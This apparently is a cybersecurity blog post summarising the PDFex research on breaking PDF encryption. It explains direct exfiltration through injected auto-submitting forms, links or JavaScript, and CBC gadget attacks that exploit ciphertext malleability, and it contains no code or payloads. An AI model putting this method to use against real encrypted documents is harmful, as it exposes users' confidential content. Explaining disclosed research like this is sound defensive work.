Well, that's now possible, thanks to a set of attacking techniques that could allow attackers to access the entire content of a password-protected or encrypted PDF file.
PDFex, the new techniques include two classes of attacks that take advantage of a vulnerability in the standard encryption protection built into the PDF (Portable Document Format). The PDFex doesn't allow an attacker to know or remove the password for an encrypted PDF file. But it allows an attacker to remotely exfiltrate content once a legitimate user opens that PDF file.
In other words, PDFex attack allows attackers to modify a password-protected or encrypted PDF file, without having the corresponding password, in a way that when opened by someone with the correct password, the file will automatically send out a copy of the decrypted content to a remote attacker.
PDFex was tested against 27 desktop and web PDF viewers, such as Adobe Acrobat, Foxit Reader, Evince, Nitro Reader, Okular, and the built-in PDF viewers of Chrome, Firefox, Safari, and Opera. All of the tested PDF viewers were found vulnerable.
It is important to note that the attack is targeting the encryption supported by the PDF (Portable Document Format) standard, not external applications.
PDFex Attacks Exploit Two PDF Vulnerabilities
Two major vulnerabilities of PDFex attacks are :
1. Partial Encryption
Standard PDF specification by design supports partial encryption that allows only strings and streams to be encrypted, while objects defining the PDF file's structure remains unencrypted.
Thus, support for the mixing of plaintexts with ciphertexts leaves an opportunity for attackers to easily manipulate the file structure and inject a malicious payload into it.
2. Ciphertext Malleability
PDF encryption uses the CBC (Cipher Block Chaining) encryption mode with no integrity checks, that can be used by attackers to create self-exfiltrating ciphertext parts.
PDFex Attack Classes: Direct Exfiltration and CBC Gadgets
Now, Let's understand the two classes of PDFex attacks.
Class A : Direct Exfiltration
It takes advantage of the partial encryption feature (means don't encrypt the entire PDF file, leaving some parts unencrypted) of a password-protected PDF file.
Thus, an attacker can modify the unencrypted field, add unencrypted objects and create a trapped PDF file that when decrypted and opened will attempt to send the file's content to an attacker.
This can be achieved in three ways :
1. By modifying a PDF file's unencrypted data to add a PDF form that auto submits the PDF's content to an attacker's server when the victim decrypts and opens an encrypted PDF file.
2. By modifying a PDF file's unencrypted data to add a link that automatically triggers when the victim decrypts and opens an encrypted PDF file.
3. By modifying a PDF file's unencrypted data to add JavaScript code that automatically runs when victims decrypts and opens an encrypted PDF file.
Out of three ways, the first one is easier to perform and most efficient as it doesn't require user interaction. The second one requires opening an external browser, and the user could prevent this. The third one is the less reliable method because many PDF apps limit JavaScript (JS) support due to security risks with having PDF files run JS code in the background.
As shown in the picture, the object which contains the link (in blue color) for form submission is not encrypted and completely controlled by an attacker.
Class B : CBC Gadgets
CBC gadgets mean that the ciphertext is modified to exfiltrate itself after decryption.
Not all PDF viewers support partially encrypted documents, but many of them also don't have file integrity protection, which allows attackers to modify the unencrypted data directly within an encrypted object.
The attack scenario of CBC gadget is almost the same as the Direct Exfiltration attacks with the only difference that here attacker modifies the existing encrypted content (after a user opens encrypted PDF file) or create new content from CBC gadgets to add actions that define how to exfiltrate data.
Besides this, if a PDF file contains compressed streams to reduce the file size, attackers need to use half-open object streams to steal the data.
An attacker can use a CBC gadget to modify the encrypted content so that they create trapped PDF files that submit their own content to remote servers via PDF forms or URLs.
Among 27 widely used desktop and web PDF viewers, all of them are vulnerable to at least one of those attacks.
All of these attacks require that an attacker is in a position to modify encrypted PDF files. This includes a position to intercept the user's network traffic or having physical access to a storage system.
PDFex is a major vulnerability in the PDF standard and this must be fixed in future PDF specifications.
For more details of the PDFex attacks, you can go on to this website released by the researchers and the research paper titled, " Practical Decryption exFiltration: Breaking PDF Encryption."
I hope you find useful information in this article. If you have any questions then please mention in the comments section and I will get back to you and stay tuned with my blog to learn interesting things related to cybersecurity and hacking.
Comments
Post a Comment